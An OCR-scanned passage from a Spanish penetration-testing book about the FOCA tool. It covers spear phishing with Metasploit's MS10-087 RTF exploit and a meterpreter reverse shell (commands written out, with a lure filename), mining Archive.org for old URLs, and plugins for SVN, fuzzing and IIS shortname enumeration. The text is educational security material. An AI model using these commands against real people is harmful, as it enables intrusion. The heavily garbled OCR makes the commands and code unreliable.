Tal  y  como  se  estudio  en  el  segundo  capitulo  del  libro,  FOCA  es  capaz  de  descubrLr  gran  cantidad 
de  dates  de  un  dominie  auditado,  entre  los  que  se  encuentran  el  software  instalado  en  los  equipos 
elientes  utilizados  para  la  creacion  de  documentos,  su  si  sterna  operative,  los  nombres  de  usuario 
de  los  trabajadores  de  la  organization  o,  incluso,  sus  correos  electronicos.  Con  esta  informacion, 
preparar  un  ataque  Spear  Phising  se  convierte  en  una  tarea  sencilla. 

Si  durante  el  proceso  de  re  co  lection  de  informacion  FOCA  descubre  que  en  una  cantidad  importante 
de  ordenadores  de  la  compania  objetivo  se  encuentra  instalada  alguna  version  de  la  suite  ofimatica 
de  Microsoft,  el  auditor  podria  tratar  de  explotar  la  Vulnerabilidad  Microsoft  Office  RTF  Parsing 
Stack  Overflow,  presente  en  todas  las  versiones  de  Office  2010 ,  2007,  2003 ,  y  XP  anteriores  al 
boletin  MSI  0-087,  y  que  podria  permitir  a  un  atacante  la  ejecucion  de  codigo  en  el  sistema. 

El  pentester,  para  ello,  tendria  que  recopilar  los  correos  electronicos  de  todos  aquellos  usuarios  en 
cuyo  equipo  estan  instaladas  estas  aplicaciones,  preparar  un  fiehero  RTF  malicioso  y  enviarselo  a 
lodas  las  potentiates  victimas  con  el  fin  de  que  alguna  de  el  las  abra  el  adjunto. 

Para  preparar  el  fiehero  RTF  modificado  se  podria  utilizar  el  framework  Afe/asploit2,  una  aplicacidn 
muy  utilizada  por  profesionales  de  la  seguridad  information  para  rcalizar  tests  de  penetration.  Este 
framework  incluye  herramientas,  bibliotecas,  modules  y  una  interfaz  de  usuario,  y  su  funcionalidad 
basiea  consists  en  un  lanzador  de  modules  que  pemiite  a  I  usuario  configurar  un  exploit  y  latizarlo 
contra  un  equipo  objetivo,  de  forma  que,  si  el  exploit  tiene  exito,  se  ejecuta  el  payload  en  la  maquina 
atacada.  El  exploit ,  por  tanto,  es  un  codigo  escrito  que  trata  de  aprovechar  una  Vulnerabilidad  en  un 
programa,  mientras  que  el  payload  es  el  codigo  que  se  inyeeta  en  la  maquina  a  traves  del  exploit , 
siendo  el  ease  mas  habitual  una  shell  inversa  que  establezca  una  con  exion  con  el  equipo  del  auditor 
para  que  este  pueda  interactuar  con  la  maquina  comprometida. 


2  HTTP:/ / www.  me  fa  s  plo  i  l  .cam/ 
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Siguiendo  con  el  ejemplo,  el  pen  tester  tendria  que  consul  tar  la  base  de  datos  de  exploits  de 
A/etosploit  para  comprobar  si  existe  algun  modulo  que  aproveche  la  Vulnerabilidad  Microsoft 
Office  RTF  Parsing  Stack  Overflow,  con  C  VE-2 0 1 0- 3 33 3 ,  comprobando  que,  en  e  fee  to,  el  modulo 
Microsoft  Want  RTF  p Fragments  Stack  Buffer  Overflow  (File  Format)  implementa  un  exploit  para 
dicha  Vulnerabilidad. 

El  pentester,  por  tanto,  tendria  que  seleccionar  el  exploit  ms  10  087  rtf  pfragments  hof  y  elegir  el 
payload deseado,  como  podria  ser  una  shell  reversa. 

msf  >  use  exploi  tf  Windows  fi ileformat /ms  10_087_rtf _pf ragmen ts_bof 

msf  exploit  (ms!0_087_rtf_pf ragmen ts_bof)  >  set  payload  Windows /meterpreter/ Re ver- 
se_tcp 

A  continuacion  se  deben  configurar  adecuadainente  los  parametros  de  ambos  para  que  el  ataque 
tenga  exito.  Para  conocer  las  opc tones  de  configuracton  disponibles  puede  usarse  la  orden  show 
OPTIONS: 

msf  exploit  (ms  10_0 8 7_rtf_pf ragmen ts_bof)  >  show  OPTIONS 

Module  OPTIONS  (' exploi  t/  Win do  ws /file  format /ms  10_0  8  7_rtfjp  fragment  s_bof)  : 

Name  Current  Setting  Required  Description 

FILENAME  msf*  rtf  yes  Th©  file  name. 

Payload  OPTIONS  ( Windows/m^  terpr^t-ex/ Fever  settop)  : 

Name  Current  Setting  Required  Description 


EXITFUNC  process  yes  Exit  technique:  seh .  , 

ItHost  yes  The  listen  address 
LFORT  4444  yes  The  listen  port 
Exploit  target: 

Id  Name 

0  Automatic 

Como  puede  observarse,  el  exploit  presenta  el  parametro  FILENAME ,  que  sera  el  nombre  del  fichero 
RTF  generado.  Por  defecto  el  nombre  es  msf  rtf  por  lo  que  habria  que  modi  fi  car  ese  nombre  por  uno 
con  mas  posibilidades  de  ser  abierto  por  las  potenciales  victimas,  entrando  cn  juego  la  habilidad  del 
pen  tester  en  las  tecnieas  de  ingenieria  social.  El  parametro  mas  importante  del  payload  cs  LHost 
que  indica  la  direccion  IP  a  la  que  el  payload  tratara  de  conectarse  si  el  exploit  Liene  exito,  y  que 
debe  apuntar  al  equipo  del  pen  tester. 

msf  exploi  t  (ms  10_087_rtf_pfragments__bof )  >  set  FILENAME  modificacion_f  echas_vaca- 
clones . rtf 

msf  exploi  t  (ms  1 0_0  87_r  tf_pf  ragmen  ts_bof)  >  set  "LHost  IP_pentester 
msf  exploi  t  (ms  10_087_r  tf_pf  ragmen  ts_bof)  >  exploit 

En  ese  momenta,  el  auditor  enviaria  por  correo  eleetronico  el  fichero  modification  _fecfaas_ 
vacaciones.rtf que  se  ha  generado  a  la  lista  de  potenciales  victimas  que  se  recopild  con  FOCA.  Si 
final  mente  alguna  de  el  las  abre  el  fichero  con  una  version  de  Office  vulnerable  el  ataque  tendria 
exito  y,  por  tan  to,  el  payload  devolved  a  una  consol  a  de  Meterpreter  con  la  que  el  atacante  podria 
interaccionar  y  ejecutar  una  gran  cantidad  de  acetones,  como  realizar  un  volcado  de  las  cuentas  dc 
usuario  almacenadas  en  la  maquina  local  junto  con  slis  hashes,  activar  un  sniffer  cn  la  red  interna 
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para  capturar  el  trail co  o,  incluso,  utilizar  esta  maquina  para  tratar  de  ganar  aceeso  a  otros  servidores 
de  la  red. 


URLs  desde  el  pasado:  FOCA  +  Archive,org 

A  la  hora  de  realizar  una  auditoria  a  un  sitio  web  que  ya  Neva  un  tiempo  en  Internet,  una  tarea  que 
puede  aportar  una  gran  c  anti  dad  de  informacion  al  pentester  es  realizar  un  repaso  historico  de  las 
diferentes  versiones  de  la  web. 

Si  bien  ios  propios  buscadores  de  Internet  eomo  Google ,  Bing  o,  incluso,  Rohtex  o  Shodan  pueden 
ofrecer  resultados  que  no  es  posible  encontrar  el  momento  de  realizar  la  auditoria,  debido  a  que 
se  hay  an  producido  cam  bios  desde  que  el  b  use  ad  or  realizo  la  con  suita,  el  sitio  Archive.org  “ The 
Wayback  Machine”2  va  mucho  mas  alia  en  este  senlido,  ya  que  almacena unos  240  billones  de  paginas 
web  que  ban  sido  archivadas  desde  el  ano  1996  y  mamiene  una  linea  temporal  de  la  evolucion  de 
cada  sitio  web. 

funcionamiento  de  esta  aplicacion  es  muy  sencillo,  ya  que  basta  con  introducir  la  Ur!  del  sitio 
auditado  en  la  caja  de  b  usque  da  y  Archive, org  mostrara  un  ealendario  y  un  timeline  que  permite 
al  usuario  navegar  por  las  diferentes  versiones  de  la  pagina,  de  forma  que  es  posible  visualizar  y 
estudiar  cada  una  de  las  modificaeiones  realizadas  en  cada  pagina  del  sitio. 

Archive.org  permite  acccder  al  listado  completo  de  las  URLs  historicas  de  un  sitio  web ,  para  lo  que 
tan  solo  hay  que  incluir  un  *  delante  de  la  Url  auditada  (en  la  posicion  correspondiente  a  la  fee  ha) 
y  otro  detras. 

Por  ejemplo,  si  la  web  analizada  fuera  HTTP: ffinformatica64.com,  se  obtendria  el  listado  completo 
al  solicitar  el  recurso  HTTP:ffweb. archive. orgfwebf*fHTTP:/finformaiica64. com/*.  El  resultado 
es  una  tabla  con  seis  columnas  (Ur!,  FROM ,  TO,  CAPTURES ’  DUPLICATES,  UNIQUES)  que 
comendra  todas  las  URLs  archivadas  de  ese  dominio. 


4.117  URLs  have  been  captured  for  this  domain. 

Shew.  glOO  cntrkM. 

Flftorfe&urta  (Le.  Mxrj: 

URL  f 

FROM 

TO  CAPTURES  DUPLICATES 

UNIQUES 

httD : // i  nf ormatica64  co  m/Ad  dTo  C  a  len 
dar.ashx?id=  0900 1 1 350 

may  10,  2012 

aay  18.  2912  1  & 

1 

http  ://mformatica64 .  co  m/AddToC  a  len 
dar.ashx?id-09001 1620 

erve  21,  2611 

tne  11,  2613  1  9 

1 

http  ://mforrr>a  tica64 .  com/Ad  dTo  C  a  (e  n 
darashx?id^16C011256 

may  18.  2612 

may  16,  2912  1  S 

1 

htto  //in  form  atica64 .  co  m/AS  C  odi  q  oF  u 
enteasox 

sep  18,  2912 

cne  1ST  2913  5  9 

s 

Images!  05.16:  4.117  URLs  aJmacenadas  para  el  dominio  mformatica64.com. 


Utilizando  un  sencillo  script  que  exlraiga  todas  las  URLs  de  la  tabla  devuelta  y  que  las  vuelque  a  un 
fichero  de  texto,  es  posible  cargar  estos  links  a  FOCA  haciendo  uso  de  la  opcion  “Anadir  links  desde 


3  fTiTP'Jl  arch  i  v  e  .org/  web)  web .  PH  P 
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un  fichero”,  tal  y  como  se  mostro  en  el  truco  FOCA  +  Spidering,  de  modo  que  todos  Ids  enlaces 
seran  mostrados  como  si  fueran  URLs  de  document  os  a  descargar  y  el  motor  de  analisis  dc  URLs 
comenzara  a  trabajar  de  forma  automatica,  pudiendo  el  usuano  completar  el  analisis  eon  el  resto  de 
las  op ci ones  de  FOCA . 


Con  este  truco  el  auditor  podra  analizar  eon  FOCA  las  diferentes  copias  hisloricas  de  cada  archivo, 
como  el  robots Jxt,  extraer  los  metadatas  de  las  diferentes  versiones  de  cada  documento  olimatico, 
acceder  a  archives  de  una  web  antigua  que  aun  sigan  en  el  servidor  o  navegar  per  el  tiempo  hasta  el 
pun  to  de  lallo,  ya  que  en  ocas  i  ones  puede  ocurrir  que  alguna  de  las  versiones  almacenadas  conte  nga 
fa!  los  de  seguridad  o,  incluso,  que  alguna  de  las  copias  fuera  almacenada  con  el  eddigo  fuente  del 
silio  enlregado  al  buscador,  tal  y  como  se  muestra  en  la  siguiente  imagen  eon  la  web  de  Apple, com 
y  un  eodigo  en  PUP. 


O  l?.l  wfib.archiw.org  /  web/  201 00  330  i  Q1 404  /  http:  f  /  com  su  Itanis  ■*  ppte  -  com  /  macamenca, 

7php 

//Handle  the  top  part  that  is  highlighted  in  navigation. 

Slink  -  "profiles'1! 

include ( "includeB/pagojucta. php " } 1 
//including  java  script  in  the  header 

<ocript  typE"'tMt/javiBoript'> 

function  Cftpt ion_Qhange ( field )  < 

if  (  Field  **  —  *  button  1"  J  < 

docuimnt  ^tSltwntBy  Id(  '  huttonl '  )  .className  *  'tah- 
document.gatElonientByIti(  'iafol  '  }  t  Btyla  .display  - 

document .  getElementByld  f  "  battonS  '  >  .  elfl9  atJanie  "  "tab- 
docilffieDt  <  gatElementayTd  {’  info2 ' 1  »  style  #  display  “ 

< 

document , gatElomentBy Id {' button L 1 J . elaaaHame  "  tab- 
docuDiont .  got  Element  ay  Xd*  '  infol  '  >  .  Btylfl,  display  -  '  no 

document  ,getEl  emtentSy  Id  (  "  inf  o2  '),  style  .  display  *-  "  I 

document. .  getEleotontByldt  1  button^  ’  }  .clsflattame  —  "  tab- 


>  else  { 


<7php 


</script* 

include [ " inc l.udea  / pago_top . php " J ; 

/ /include ( *  includes /garniture . php" } ; 


Imagen  05. 17:  Una  copia  de  MacAmericaJPHP  en  Archive.org  dev  lie  I  vc  el  eodigo  PHP. 


El  contar  con  una  base  histdrica  de  URLs  de  un  sitio  da  muchisima  informaciom  Podran  aparecer 
directories  antiguos  aun  publicados,  aplicaciones  inseguras,  o  servidores  que  no  hay  an  podido  ser 
localizados  aun.  Esta  funcidn  da  resultados  fantasticos  en  cualquier  proceso  de  auditoria. 

Adeinas,  no  solo  se  guardan  las  URLs  o  el  eodigo  de  las  paginas  web,  si  no  que  lambien  es  posible 
acceder  a  documentos  multimedia  como  videos,  archives  Flash,  documentos  ofimaticos  en  sus 
diferentes  versiones  y  estados,  y  por  supuesto  con  sus  metadatas,  informacidn  oculta  y  datos 
perdidos. 


Show  :  5Q  v]  entries 

Rlter  results  (le  txr).  ■  -dOC 

URL  FROM 

TO  CAPTURES  DUPLICATES  UNIQUE 

http://www.mcia  mil/barbb/downloads/  ene  zoo9 
contrman.doc 

ene  9,  2009  202 

Imagen  05.18:  Dos  copias  unicas  de  este  documents  almacenadas  cn  Archive.org 
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Incluso  aunque  el  doeumento  oJimatieo  aun  este  en  la  web,  conviene  ir  a  Archive.org  a  localizar 
todas  las  versiones  de  ese  doeumento  y  descargarlas  direetamente  desde  Archive.org .  Hay  que  tener 
presente  que  desde  Archive.org  se  puede  obtener  la  Ur!  del  sitio  que  se  copio,  pero  tambien  la  Ur  I 
del  doeumento  eopiado  por  ellos  en  cada  una  de  las  fechas  que  tienen. 


3.  Plugins  en  FOCA 

En  la  ultima  version  que  se  hizo  publiea  de  FOCA  se  incorpora  una  pequena  API ,  que  aunque  no  deja 
de  ser  un  interfaz  de  conexion  muy  rudimentario,  permite  a  los  usuarios  desarrollar  y  car  gar  plugins. 
En  la  actual  idad  hay  creados  ya  varies  plugins,  que  se  presentaran  a  continuacidn,  y  que  permiten 
sacar  aim  mas  partido  a  la  herramienta,  pero  cualquier  usuario  puede  desarrollar  sus  propios plugins 
para  ampliar  la  funcionalidad  de  FOCA. 


Por  un  lado,  los  eventos  de  la  API  de  FOCA  permiten  a  los  plugins  capturar  determinados  mensajes 
que  les  son  enviados  en  euanto  estos  se  produeen.  Entre  los  eventos  que  se  encuentran  disponibles 
estan  OnNewDomain,  OnNewIP,  OnNewURL,  OnNewProject  y  OnNewDocumen t,  que  son  lo 
sufic ientemente  autodescriptivos  para  saber  cuando  se  envian. 


Imagen  05. 19:  Esquema  de  funcionamienio  de  b  API  de  FOCA. 


Por  otro  lado,  para  que  los  plugins  puedan  interactuar  con  el  interfaz  grafico  de  FOCA ,  la  API  pone 
a  disposition  del  desarrollador  muchas  operaciones,  como  AddDomain,  Addproxy ,  Add  Backup, 
AddUser,  Assign Rol  o  AddContext Menu. 

Con  estos  va lores,  por  ejemplo,  se  podria  capturar  el  deseubrimiento  de  una  nueva  direecion  IP 
y  ianzar  por  ejemplo  una  herramienta  especifica  para  hacer  un  fingerprinting  de  software  web 
especifieo  y  los  resultados  obtenidos  enviarios  a  I  proyecto  de  FOCA  para  que  puedan  ser  mostrados 
en  la  interfaz  de  la  herramienta. 


En  la  parte  final  de  este  lihro  puede  encontrarse  un  ejemplo  en  el  que  se  muestra  como  desarrollar  un 
plugin  sencilio  desde  cero  y  en  el  que  se  cuentan  todos  y  cada  uno  de  los  mensajes  que  se  generan 
y  cuando  se  generan,  para  que  se  puedan  adaptar  las  llamadas  necesarias  del  plugin  que  se  quiera 
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construir.  Todos  los  plugins  se  instalan  y  desinstalan  en  FOCA  a  t  raves  de  la  ope  ion  Load/Unload 
Plugins  del  menu  Plugins  A  bora  vamos  a  ver  Los  que  ya  estan  construidos. 


Plugin  .svn/entries  parser 

El  objetivo  final  que  persigue  el  uso  de  este  plugin  es  tratar  de  averiguar  el  max i mo  posible  de 
informacion  relativa  a  la  eslructura  interna  de  un  servidor  o  de  un  dominio  complete,  y  buscar 
archives  con  information  sensible  para  la  seguridad,  como  pueden  ser  ficheros  con  contrasenas, 
conexiones  a  bases  de  datos  o  archives  con  copias  de  seguridad,  que  los  administradores  hayan 
podido  pasar  por  alto  pensando  que  no  eran  accesihles  y  que,  en  ultima  instancia,  puedan  permitir 
una  escalada  de  privilegios. 

El  plugin  .svn/entries  parser  permite  analizar  los  ficheros  .svn/entries  que  hayan  side  descubiertos 
on  alguno  de  los  servidores  del  dominio  auditado.  Estos  archives  almacenan  la  informacion  de  las 
ultimas  aclualizaciones  que  se  han  realizado  en  un  proyecto  de  desarrollo  que  util  ice  SVN  como 
gestor  de  codigo,  y  son  ficheros  de  texto  en  los  que  puede  aparecer  gran  cantidad  de  informacion, 
como  usuarios,  rutas  intemas,  fechas  e  informacion  tactica  de  la  companla  que  puede  ser  de  mueha 
utilidad  para  lanzar  ataques  de  fuerza  bruta,  localizar  ficheros  ocultos  o  perdidos,  o  simplemente 
nuevas  URLs  de  servidores  web  para  analizarlos  poster iormente  eon  FOCA . 

Una  vez  que  FOCA  ha  descubierto  un  servidor  con  esta  vulnerabilidad,  el  anal i sis  de  todos  estos 
ficheros  es  posible  realizarlo  con  el  plugin  de  forma  rrtuy  send  Ha,  ya  que  basta  con  indicar  la 
direccion  en  ia  que  esta  alrnacenado  dicho  fie  hero  y  el  plugin  clasificara  los  datos  por  extensiones  y 
por  ficheros,  en  forma  de  arbol. 

Como  se  puede  observer  en  la  imagen  05.20,  dentro  de  estos  ficheros  es  posible  localizar  rutas 
a  bases  de  datos  o  rutas  a  ficheros  de  log  de  errores.  Hay  que  tener  presente  que  esos  ficheros 
supuestamente  se  encuentran  en  entomos  de  desarrollo,  donde  aim  no  se  ban  aplicado  lodas  las 
rnedidas  de  seguridad* 
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De  hecho,  utilizando  este  plugin  con  el  sitio  web  de  Apple,  investigadores  do  Jnformdtica64 
local  izaron  una  shell  dc  uso  intern  o  de  esta  compania  que  permit!  a  explorar  to  do  el  si  stern  a  de 
ficheros  del  servidor.  Por  supuesto  el  problem  a  fire  notificado  a  Apple,  quienes,  tras  solucionarlo, 
publicaron  en  su  web  una  mencion  dando  credito  y  agradeciendo  el  descubrimiento. 


Plugin  Web  Fuzzer 

El  plugin  web  Fuzzer  puede  ayudar  al  pen  tester  a  local  izar  paginas  y  recursos  no  enlazados  en  un 
sitio  web .  El  que  no  esten  enlazados  por  ningun  otro  archive  que  este  en  la  web ,  y  el  que  esten  sin 
Index ar  en  los  buscadores  no  quiere  decir  para  nada  que  no  este  all!  el  archivo,  Para  ello,  mediante 
un  escaneo  automatico  basado  en  diceionarios  y  con  patrones  de  comportamiento  especiales  se 
puede  amp  liar  el  numero  de  ficheros  local  izados. 

Durante  las  auditorial  web  es  baslanle  habitual  encontrar  recursos  en  los  mismos  directories  donde 
sc  aloja  la  pagina  web,  que  no  ban  sido  enlazados  desde  el  sitio  web  porque  el  admin  is  trader  no 
quiere  que  scan  accedidos  por  los  usuarios,  pero  que  a  el  le  resulta  muy  comodo  tener  en  esa  misma 
local izaciom  Los  recursos  que  pueden  encontrarse  con  esta  tecnica  podrian  incluir  una  copia  de 
seguridad  de  una  parte  del  sitio  web,  un  script  de  mantenimiento,  un  panel  de  control  del  CMS o  un 
phpMyAdmin,  por  citar  algunos  ejemplos. 

El  Web  Fuzzer  tiene  un  funcionamiento  muy  sendllo  de  en  ten  den  Para  hacerlo  funcionar  tan  solo  se 
necesi  ta  un  fiehero  que  haga  de  diccionario  con  una  buena  eantidad  de  palabras  coni  Lines  que  sean 
habitual  es  en  los  sitios  web,  Ese  con  junto  de  term  i  nos  del  diccionario  ira  siendo  sustituido  en  todas 
las  peticiones  GET  que  se  realicen  en  la  posicion  donde  se  ha  escrito  la  palabra  FOCA  -  que  aetiia 
como  variable  tal  y  como  se  muestra  en  la  imagen  siguiente 
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En  el  ejemplo  mo s trad o  se  habia  detectado  con  FOCA  previamente  que  ese  servidor  estaba  utilizando 
mod  user  dir.  For  tanto,  con  el  objetivo  dc  eneomrar  todos  los  directories  de  usuarios  posibles  que 
se  encontraran  en  ei  serv  idor,  se  puede  crear  tin  archivo  eon  la  Hsta  de  usuarios  loealizados  por 
FOCA  en  las  fuses  anteriores  de  analisis  de  metados  y  anadir  al  diccionario  una  lisla  de  usuarios 
comunes  para  que  A  plugin  trate  de  comprobar  si  los  recursos  existen. 


En  los  resultados  que  mueslra  el  plugin  se  obtienen  aquellas  rcspuesias  que  han  devuelto  un 
determinado  codigo  de  servidor  y/o  que  son  de  un  tamano  distinto  en  palabras,  tineas  o  peso  total 
en  bytes  a  las  que  el  usuario  ha  configurado  para  ser  ocultadas  y  no  generar  ruido  en  la  visualizacion 
de  los  mismos. 


Imagen  05,22:  Resultados  obtenidos  con  cl  plugin  Web  Fuzzer, 


Como  se  puede  ver,  este  plugin  cuenta  con  unos  botones  que  penmen  exportar  las  URLs  a  on 
fichero,  o  seleceionar  que  URLs  deseubiertas  se  tienen  que  caviar  al  proyecto  principal  de  FOCA 
para  continuar  con  cl  analisis  de  la  nueva  informacion  descubierta. 


Plugin  IIS  Shortname  Extractor 

El  plugin  IIS  Shortname  Extractor  pemiite  extraer  el  listado  de  ficheros  de  un  servidor  el  que  FOCA 
hay  a  localizado  la  Vulnerabilidad  IIS  Url  Shortname.  Este  bug,  tal  y  come  se  explica  en  el  cap  ltulo 
4,  pemiite  realizar  un  descubrimiento  de  archives  en  un  servidor  Internet  Information  Services  por 
medio  del  si  sterna  de  nombres  acoriados  que  aun  incorpora  el  sistema  de  ficheros  en  Microsoft 
Windows. 

Por  tanto,  un  servidor  US  vulnerable  es  practicamente  como  si  tuviera  un  listado  de  directorios 
abiertos,  ya  que  un  atacante  solo  Lendria  que  automatizar  una  herramienta,  como  este  mismo 
plugin,  para  obtener  la  lista  de  ficheros  y  directorios  almacenados  en  el  servidor.  For  este  motive  es 
sorprendente  la  gran  cantidad  de  servidores  web  vulnerables  que  es  posiblc  encontrar  conectados  a 
Internet,  y  llama  especialmente  la  atencion  lo  habitual  que  es  localizar  esta  vulnerabilidad  en  sitios 
gubema me ntales  o  relacionados  con  la  seguridad  national  de  muchos  paises,  incluso  de  aquellos 
preocupados  por  la  ciberseguridad* 
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Para  local  izar  servidores  vulnerables  es  posible  utilizar  Shodan.  Simplemente  usando  la  eadena  de 
busqueda/iS,  Shodan  devolved  equipos  en  Ids  que  on  la  cabecera  Server  devuelta  por  los  servidores 
web  ha  encontrado  esta  eadena,  es  deeir,  servidores  Internet  Information  Services ,  y  FOCA  buscara 
en  todos  los  IIS  que  encuemre  esta  Vulnerabilidad,  tal  y  como  se  ha  visto  anteriormente. 

Un  vez  enconirado  un  servidor  vulnerable,  la  extraccidn  de  la  information  de  los  ficheros  y 
directories  alojados  en  el  es  Lina  tarea  sene  ilia  que  puede  automatizarse  eon  este  plugin  o  con  el 
que  se  presenta  a  continuacion,  que  es  en  realidad  una  version  mejorada  que  aprovecha  tambien  la 
potencia  del  Fuzzer . 


[DIR]  bttp:/|3S:  ji*:  iom/aspnet'1 
(D 1 R]  http  g conesm^  1 

[DIR]  http 

URL  http;/^ :  .  -on 

Start 

Threads  2 

. 

http  ^om/precof 

http:^  >  ^om/giobal 

Imagen  05.23:  E  x  tray  end  o  informaci6ri  de  los  lieberos  con  el  plugin  US  Shortname  Extractor. 


Este  plugin  se  hizo  con  bastantes  limitaciones,  asi  que  se  decidid  hacer  uno  nuevo  que  aunara  la 
potencia  del  webfuzzering  y  el  hug  d e  JIS  Short  Name,  y  es  el  siguiente  que  puedes  ver  a  eontinuaeion. 


NTFS  Based  Server  Enumerator 

El  plugin  NTFS  Based  Server  Enumerator  nace  com  o  una  combination  de  los  dos  anter  lores,  ya  que 
hace  uso  tanto  del  scanner  IIS  Short  Name  como  del  Web  Fuzzer  para  tratar  de  obfcener  la  estructura 
interna  del  servidor  analizado.  Se  trata  este  de  un  plugin  altamente  configurable,  y  presenta  cuatro 
pestanas  para  que  el  auditor  lo  ajuste  a  sus  necesidades. 

En  la  primera  pestana  se  selecciona  la  Url  a  atacar,  el  tipo  de  servidor,  si  se  desea  utilizar  el  Fuzzer 
de  carp  etas  para  nombres  de  men  os  de  8  carac  teres  de  longitud,  los  dictionaries  para  reconstruir  las 
carpet  as  de  8:3  y  un  Mstado  de  User- Agents  a  utilizar 

En  esta  version,  a  dil’erencia  del  plugin  anterior,  se  soportan  3  tipos  distintos  de  servidores  distintos: 
II S  5-6,  IIS  I  y  Ngix  (en  fase  de  pruebas  en  el  momento  de  eseribir  este  libro).  A  pesar  de  que  en 
todos  los  serv  idores  se  explota  la  Vulnerabilidad  de  forma  similar,  existen  ciertas  variaciones  entre 
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ell  os*  De  liecho.  aunque  el  servidor  Nginx  tambien  es  vulnerable  a  este  hug,  no  tiene  tod  as  las 
posibilidades  disponibles  en  los  servidores  IIS. 

En  la  siguiente  pestaha  se  encuenlran  los  controles  avanzados  de  rendimiento,  en  los  que  se  puede 
configurar  el  numero  de  hi  los  del  Fuzzer ;  el  del  scanner  de  short  names  viene  prefijado,  el  maxi  mo 
numero  de  hilos  concurrentes,  el  numero  maximo  de  reintentos  en  caso  de  error  en  la  petition  de  las 
URLs  y  el  retraso  en  el  1  an  z  am  lento  de  cada  hilo  segun  el  tipo.  Hay  que  tener  en  cuenta  que  tan  to  el 
scanning  de  1SS  Short  name  -  que  es  un  ataque  Blind  -  como  el  del  Fuzzer  -  que  es  una  fuerza  brut  a 
-  son  intensivos,  as!  que  para  no  turn  bar  el  servidor  eon  viene  poder  regular  la  intensidad  del  plugin. 


En  la  seccion  de  los  diecionarios  aparece  la  ruta  relativa  a  eada  uno  de  los  diccionarios  utilizados, 
Debe  tenerse  en  cuenta  que  el  unieo  utilizado  en  el  Fuzzer  es  el  que  viene  indicado  eon  el  n ombre, 
el  resto  se  utilizan  para  re  comp  oner  el  n  ombre  de  archivos  y  carpet  as,  (e!  del  User-agent  no  es 
configurable)  y  si  se  haee  doble  clic  en  los  textbox  aparece  un  cuadro  de  dialogo  para  seleccionar  un 
diccionario  propio. 


En  la  cuarta  pestana  se  pueden  configurar  parametros  especiales  como  son  cl  range  de  simbolos 
a  probar,  d  rango  de  carpetas  con  el  mismo  nombre  a  abarear  y  la  posibilidad  de  alterar  el 
comportamiento  del  programa  si  el  serv  idor  incorpora  algun  tipo  de  proteccion  que  arroje  codigo  de 
redireccion  en  caso  de  error. 
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lmagen  05.24;  Ope  tones  de  eonfiguracidn  del  plugin  NTFS  Based  Server  Enumerator 
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Pentesting  con  FOCA 


El  plugin  NTFS  Based  Sewer  Enumerator  presenta  difereixtes  vistas  para  que  el  auditor  pueda 
conoeer  en  eualquier  momento  el  estado  del  analisis.  El  panel  de  monitorizacion  muestra  un  resumen 
del  estado  del  plugin  y  del  trabajo  realizado,  eon  information  sobre  el  numero  de  hilos  en  uso  y  la 
cantidad  de  elementos  encontrados  hasta  el  momento. 

Por  su  parte,  el  panel  de  seguimiento  ofrece  information  con  mayor  detail e  de  las  petitiones  que 
se  estan  realizando  y  de  otros  mensajes  sobre  el  estado  del  plugin  para  conocer  si  la  ejeeucion  esta 
funcionando  correctamente  o  si  se  esta  produciendo  alguna  situation  anomala. 

Y  por  ultimo,  el  panel  graft  co  de  resumen  permite  apreciar  de  manera  mas  visual  los  re  su  kudos 
obtenidos  mediante  un  arbol  autogenerado  a  parti r  del  sitio  web  y  las  extensiones  de  los  ficheros  que 
causan  un  comportamiento  especial  por  parte  del  servidor,  genera  Imente  errores  500. 

Una  de  las  caraeterlsticas  del  funcionamiento  de  este  plugin  es  que  la  interaction  con  FOCA  es 
constante.  Tras  iniciar  el  plugin ,  la  primera  action  que  se  realiza  es  el  envio  de  la  Url  a  FOCA  para 
que  esta  busque  en  internet  elementos  como  el  robot Jxt  u  otras  URLs. 

Despues  se  queda  esperando  a  recibir  las  direcciones  Url  reconocidas  para  regenerar  un  arbol  de 
director! os  del  sitio  web  ya  conocidos  y  hacer  que  el  eseaneo  sea  mucho  mas  rap i do.  Cada  vez  que 
reconoce  una  Url  completa  y  se  procede  a  analizarla  con  el  plugin,  esta  Url  es  devuelta  de  nuevo  a 
FOCA  para  que  la  analice  buscando  los  metodos  HTTP  soportados,  listados  de  directorios  abiertos, 
ficheros  .listing,  etcetera.  Resulta  obvio,  pero  digno  de  mention,  que  al  eonfigurar  FOCA  para  que 
use  un  Proxy,  los  paquetes  generados  por  el  plugin  tambten  son  redireccionados  a  traves  del  proxy . 

De  manera  automatics  el  plugin  esta  preparado  para  guardar  el  progreso  del  mismo  cada  1 0  minutos 
en  la  carpeta  “C:\Users\Ususario\FOCA”.  Del  mismo  mode,  durante  el  proceso  de  inicio  el  plugin 
buscara  dicho  archive  para  precargar  el  estado  antes  del  ultimo  cierre.  De  mode  adicional  se  presenta 
la  posibilidad  de  realizar  el  proceso  manual, 

Como  comentario  final  sobre  el  plugin  habria  que  mencionar  que  ei  auditorpuede  realizar  correcciones 
de  forma  manual  en  todo  momento.  En  el  mismo  panel  en  el  que  se  encuenlran  las  opciones  de 
cargay  guardado  se  puede  acceder  a  un  menu  especial  que  permite  interaeluar  directamente  con  los 
resultados  obtenidos  por  el  plugin. 

En  dicho  panel  sc  muestra  un  listado  desplegable  con  todas  las  direcciones  Url  encontradas  y  un 
campo  de  lex  to  para  las  sugerencias.  Si  selections  la  option  “check"  el  plugin  comprobara,  de 
manera  muy  ligera,  la  validez  de  las  opciones  encontradas,  en  caso  contrario  forzara  los  cambios. 
El  boton  “ Remove ”  eliminara  la  direction  url  del  plugin  y  el  hoton  “Apply”  precedent  a  efectuar  los 
cambios. 

Tal  y  como  se  comentaba  al  presentar  el  plugin  .svn/entries  parser,  para  probar  algunas  ftincionalidades 
de  FOCA  se  habia  cstudiado  con  la  herramienta  el  dominie  Apple. com,  y  ademas  de  descubrir  y 
notificar  algunas  vulnerabilidades,  se  obtuvo  la  conclusion  de  en  Apple  no  son  demasiado  propensos 
a  usar  solo  su  tecnologia  en  lo  que  a  los  sitios  web  que  publican  se  refiere* 
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A  file-existence  disclosure  issue  was  addressed.  We  would  like  to  acknowledge 
Chema  Alonso  and  Jose  Miguel  Soriano  of  lnformatica64.com  for  reporting  this  issue. 

Imageti  05.25:  Extraction  de  fichcros  y  reconocirriiento  del  fallo  cn  Apple. 

Por  tanto,  cuando  ei  plugin  NTFS  Based  Server  Enumerator  estuvo  listo,  el  primer  sitio  con  el  que 
se  probo  fue  con  el  de  Apple .  Asl,  tras  realizar  un  pequeno  test  sobre  uno  de  sus  servidores  IIS  y 
extraer  la  lista  de  ficheros  del  servidor,  el  problema  fue  notificado  a  Apple,  quienes  lo  comprobaron, 
